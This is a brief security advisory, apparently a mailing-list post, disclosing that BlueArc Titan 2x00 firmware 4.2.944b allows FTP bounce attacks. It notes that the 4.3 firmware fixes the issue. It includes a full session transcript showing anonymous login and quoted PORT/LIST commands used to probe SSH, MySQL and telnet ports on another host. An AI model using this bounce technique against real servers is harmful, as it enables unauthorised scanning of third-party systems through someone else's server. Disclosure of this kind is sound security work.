Hi all, BlueArc Titan 2x00 devices running firmware version 4.2.944b are susceptible to FTP bounce attacks. The vendor has confirmed this, and a fix is available in the 4.3 firmware. Example: First connect to SSH, success Then to MySQL, no success Then to telnet, no success [user@localhost ~]$ ftp bluearctitan Connected to bluearctitan. 220 Server ready (BlueArc-FTPD v1.0) Name (bluearctitan:user): anonymous 331 Username okay; need password Password: 230 User logged in, proceed Remote system type is UNIX. Using binary mode to transfer files. ftp> quote "PORT xxx,xxx,xxx,xxx,0,22" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 226 Transfer Complete ftp> quote "PORT xxx,xxx,xxx,xxx,12,234" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 425 Can't open data connection (dtp_list) ftp> quote "PORT xxx,xxx,xxx,xxx,0,23" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 425 Can't open data connection (dtp_list)
